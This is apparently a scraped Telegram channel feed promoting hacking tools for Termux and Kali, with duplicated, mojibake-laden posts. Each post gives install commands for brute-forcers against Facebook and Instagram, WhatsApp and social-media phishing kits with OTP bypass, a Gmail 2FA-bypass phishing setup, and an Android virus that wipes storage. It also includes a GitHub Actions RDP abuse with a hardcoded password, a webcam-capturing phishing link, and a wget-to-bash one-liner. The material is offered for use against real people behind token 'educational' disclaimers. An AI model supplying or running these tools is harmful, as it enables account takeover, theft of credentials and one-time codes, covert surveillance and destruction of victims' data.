Brutal
Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device
Getting Started
Enjoy π
Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device
Getting Started
git clone https://github.com/Screetsec/Brutal.git
cd Brutal
chmod +x Brutal.sh
sudo ./Brutal.sh or sudo su ./Brutal.shEnjoy π
π19β€6π3π±2
Install Requirements "On Linux"
$
$
$
$
$
$
git clone https://github.com/IAmBlackHacker/Facebook-BruteForce$
cd Facebook-BruteForce$
python3 -m pip install requests bs4$
python3 -m pip install mechanize$
python3 fb.py or python fb2.pyπ11π3β€2π1
TERMUX COMMANDD
OTP Bypass Instructions When victim enter his credentials, you need to go to original website and use those credentials to send real OTP to victim. Once he enter that OTP such OTP will also be there with you and you will be allowed to login the account beforeβ¦
How to Intsall & Use
$
$
$
$
$
git clone https://github.com/Ignitetch/whatsapp-phishing.git
$
cd whatsapp-phishing$
chmod 777 Whatsapp.sh$
./Whatsapp.shπ21β€5π5π₯3π₯°1
ABOUT TOOL :
All in one Instagram hacking tool available (Insta information gathering, Insta brute force, Insta account auto repoter)
FEATURES:
β’ Insta information gathering
β’ Insta brute force attack
β’ Insta auto repoter
β’ Update script
β’ Remove script
REQUIREMENTS:
β’ Data connection
β’ Internet 200MB
β’ storage 400MB
β’ No Root
Available On
β’ Termux
β’ Kali Linux
TEST ON:
β’ Termux
β’ Mi Note 9 pro
INSTALLATION [Termux]
β’
β’
β’
β’
β’
β’
β’
β’
β’
β’
β’
β’
INSTALLATION [Kali Linux]
β’
ENJOY βΊοΈ @TERMUXCOMMANDD
All in one Instagram hacking tool available (Insta information gathering, Insta brute force, Insta account auto repoter)
FEATURES:
β’ Insta information gathering
β’ Insta brute force attack
β’ Insta auto repoter
β’ Update script
β’ Remove script
REQUIREMENTS:
β’ Data connection
β’ Internet 200MB
β’ storage 400MB
β’ No Root
Available On
β’ Termux
β’ Kali Linux
TEST ON:
β’ Termux
β’ Mi Note 9 pro
INSTALLATION [Termux]
β’
apt updateβ’
apt upgradeβ’
pkg install pythonβ’
pkg install python2β’
pkg install gitβ’
git clone https://github.com/IncredibleHacker/insta-hackβ’
lsβ’
cd insta-hackβ’
pip3 install -r requirements.txtβ’
chmod +x *β’
bash setup.shβ’
bash insta-hack.shINSTALLATION [Kali Linux]
β’
sudo apt install python
β’ sudo apt install python2
β’ sudo apt install git
β’ git clone https://github.com/IncredibleHacker/insta-hack
β’ ls
β’ cd insta-hack
β’ pip3 install -r requirements.txt
β’ chmod +x *
β’ sudo bash insta-hack.shπ32β€6π3π2π1
ABOUT TOOL :
mrphish is a bash based script which is officially made for phishing social media accounts with portforwarding and otp bypassing cntrole. This tool works on both rooted Android device and Non-rooted Android device.
REQUIREMENTS :
internet 400
php
storage 600 MB
ngrok Token
INSTALLATION [Termux] :
[+]-- Open new session in termux and type tor
[+]-- Open second session in termux and execute mrphish tool
USAGE OPTIONS [Termux] :
START ATTACK :
From this option you can start attack and explore available option in tool Type ok in next step.
DUMPS :
From this option you can get old saved dumps of all ids.
UPDATE :
From this option you can update mrphish tool if updates are available for that
ENJOY π @TERMUXCOMMANDD
mrphish is a bash based script which is officially made for phishing social media accounts with portforwarding and otp bypassing cntrole. This tool works on both rooted Android device and Non-rooted Android device.
REQUIREMENTS :
php
storage 600 MB
ngrok Token
INSTALLATION [Termux] :
apt-get update -y
apt-get upgrade -y
pkg install python -y
pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/mrphish
cd $HOME
ls
cd mrphish
ls
bash setup
bash mrphish[+]-- Open new session in termux and type tor
[+]-- Open second session in termux and execute mrphish tool
USAGE OPTIONS [Termux] :
START ATTACK :
From this option you can start attack and explore available option in tool Type ok in next step.
DUMPS :
From this option you can get old saved dumps of all ids.
UPDATE :
From this option you can update mrphish tool if updates are available for that
π21β€4
This media is not supported in your browser
VIEW IN TELEGRAM
GMAIL PHISING WITH 2FA
DESCRIPTION :
Two-factor authentication (2FA) adds an additional layer of protection in authentication systems consisting on the proof that the user shows to be the real user. This repository aims at demonstrating how the attackers can bypass 2FA for gmail's authentication system. In this case, the two factors are password and a code sent to mobile user.
ππ»ππ»ππ»ππ»ππ»ππ»ππ»ππ»
DESCRIPTION :
Two-factor authentication (2FA) adds an additional layer of protection in authentication systems consisting on the proof that the user shows to be the real user. This repository aims at demonstrating how the attackers can bypass 2FA for gmail's authentication system. In this case, the two factors are password and a code sent to mobile user.
ππ»ππ»ππ»ππ»ππ»ππ»ππ»ππ»
π13π₯°2β€1
DEPENDENCIES-
Apache2
Python
Selenium
WHAT DOES THE REPOSITORY INCLUDE?
gmailPhising: contains the code of the gmail's authetication web.
logingmail.py: script for running the web browser "impersonating" the victim's login in the attacker's machine. This makes use of Selenium.
root.sh: this script running logingmail.py. Must be run as root for user www-data. This is configured in /etc/sudoers of the attacker's machine including the
following:
www-data ALL=(user) NOPASSWD: pathtoscript/root.sh
How to run ? .
The attacker using hacking techniques (dnsspoofing, social engineering, etc.) redirect the victim with 2FA active in gmail to fake gmail web. Once the victim logs in the fake web, the attacker's machine will run a web browser and it will go to original gmail to log in with victim's credentials. This will cause gmail send the validation code to the victim. When the victim receives the code, he will put it in the fake web. The attacker will get the code and will complete the log in the original gmail web, gaining the access to the victim account.
ENJOY βΊοΈ @TERMUXCOMMANDD
Apache2
Python
Selenium
WHAT DOES THE REPOSITORY INCLUDE?
gmailPhising: contains the code of the gmail's authetication web.
logingmail.py: script for running the web browser "impersonating" the victim's login in the attacker's machine. This makes use of Selenium.
root.sh: this script running logingmail.py. Must be run as root for user www-data. This is configured in /etc/sudoers of the attacker's machine including the
following:
www-data ALL=(user) NOPASSWD: pathtoscript/root.sh
How to run ? .
git clone https://github.com/afernandezb92/2FAGmailPhising.git
cd 2FAGmailPhising
pip install -r requirements.txt
chmod +x run.sh
chmod +x geckodriver
./run.sh
SCENERY:
The attacker using hacking techniques (dnsspoofing, social engineering, etc.) redirect the victim with 2FA active in gmail to fake gmail web. Once the victim logs in the fake web, the attacker's machine will run a web browser and it will go to original gmail to log in with victim's credentials. This will cause gmail send the validation code to the victim. When the victim receives the code, he will put it in the fake web. The attacker will get the code and will complete the log in the original gmail web, gaining the access to the victim account.
π8β€3
This RDP Only Created by @TERMUXCOMMANDD For Educational Purpose. If You Use It on Evil Purpose, Owner is Not Responsible For That.
[+] HOW TO USE:
[+] HOW TO USE:
1 : Fork This Repository. 2 : Create a Account On ngrok 3 : Copy Your Ngrok-Token 4 : Go To Your Forked Repository's "Setting" 5 : Click on The "Sicret" Option 6 : Add Your Sicret 7 : Go To Your Forked Repository's "Action" 8 : Select Your Workflow To "Cracker-RDP" 9 : Start Your Workflow
After Starting Workflow >-----------------------<
10: Go To Ngrok 11: Click On The Endpoint Option 11: And Click On The Status Option 12: Copy The URL without "tcp://" 13: The Copied Link Like: 8.tcp.ngrok.io:15003 14: Go To Your RDP Using Software 15: Then Put Your Url 16: Put The Username: runneradmin 17: Put The Password: P@ssw0rd! 18: And Connect it >---------------------< Your RDP is Ready >---------------------<π6
ABOUT TOOL :
Infect is a bash based script which is officially made for termux users and from this tool you can spread android virus by just sending link. This tool works on both rooted Android device and Non-rooted Android device. Warning π¦ This Virus Formates (Deletes) Full Internal Storage So think and Use.
AVAILABLE ON :
Termux
FEATURES :
[+] Dangerous virus tool !
[+] Updated maintainence !
[+] Easy for beginners !
[+] Working virus tool for termux
INSTALLATION [Termux] :
ENJOY βΊοΈ @TERMUXCOMMANDD
Infect is a bash based script which is officially made for termux users and from this tool you can spread android virus by just sending link. This tool works on both rooted Android device and Non-rooted Android device. Warning π¦ This Virus Formates (Deletes) Full Internal Storage So think and Use.
AVAILABLE ON :
FEATURES :
[
[+] Updated maintainence !
[+] Easy for beginners !
[+] Working virus tool for termux
INSTALLATION [Termux] :
apt-get update -y
apt-get upgrade -y
pkg install python -y
pkg install python2 -y
pkg install git -y
pip install lolcat
git clone https://github.com/noob-hackers/infect
cd $HOME
ls
cd infect
ls
bash infect.sh[+]-- Now you need internet connection to continue further process...
[+]-- You can select any option by clicking on your keyboard
[+]-- Note:- Don't delete any of the scripts included in lol directory (folder)π12π₯°3
THE CREDIT CARD FRAUDSTER
βONLY FOR EDUCATIONAL PURPOSES β
TIPS β - IF YOU DONT KNOW DONT TRY β. @TERMUXCOMMANDD
cardNumPre = "543210"
cardNumPost = "1234"
potentialSolutions = []
for i in range(0,1000000)
: cardNumMid = (str(i).zfill(6))
ccNum = cardNumPre + cardNumMid + cardNumPost
if int(ccNum) % 123457 == 0:
print(ccNum) potentialSolutions.append(ccNum)
for j in potentialSolutions:
print("CTFlearn{" + j + "}")Hints: 1/ Luhn_algorithm
2/ Flag format is CTFlearn{card_numberβONLY FOR EDUCATIONAL PURPOSES β
TIPS β - IF YOU DONT KNOW DONT TRY β. @TERMUXCOMMANDD
π7π4β€1π1
USAGE:
1. Download ZIP here and extract the ZIP
2. Install requirements.txt by typing
3. Download Google Chrome
4. Download a Chrome driver that matches your Chrome version. Download a chromedriver here.
5. You must download the correct chromedriver that matches your Chrome version. Check out your version here
ENJOY βΊοΈ @TERMUXCOMMANDD
1. Download ZIP here and extract the ZIP
2. Install requirements.txt by typing
pip install -r requirements.txt in Command Prompt.3. Download Google Chrome
4. Download a Chrome driver that matches your Chrome version. Download a chromedriver here.
5. You must download the correct chromedriver that matches your Chrome version. Check out your version here
β€6π3π1π1
CAMHACKER -
CamHacker is a phishing tool. It will generate a link. If anyone opens the link and permits camera access, his/her photo will be captured and sent to you!
+] INSTALLATION
For termux, use additional command -
Or Run Directly -
ENJOY βΊοΈ @TERMUXCOMMANDD
CamHacker is a phishing tool. It will generate a link. If anyone opens the link and permits camera access, his/her photo will be captured and sent to you!
+] INSTALLATION
git clone https://github.com/KasRoudra/CamHacker
cd CamHacker
termux-setup-storage , bash ch.shOr Run Directly -
wget https://raw.githubusercontent.com/KasRoudra/CamHacker/main/ch.sh && bash ch.shπ16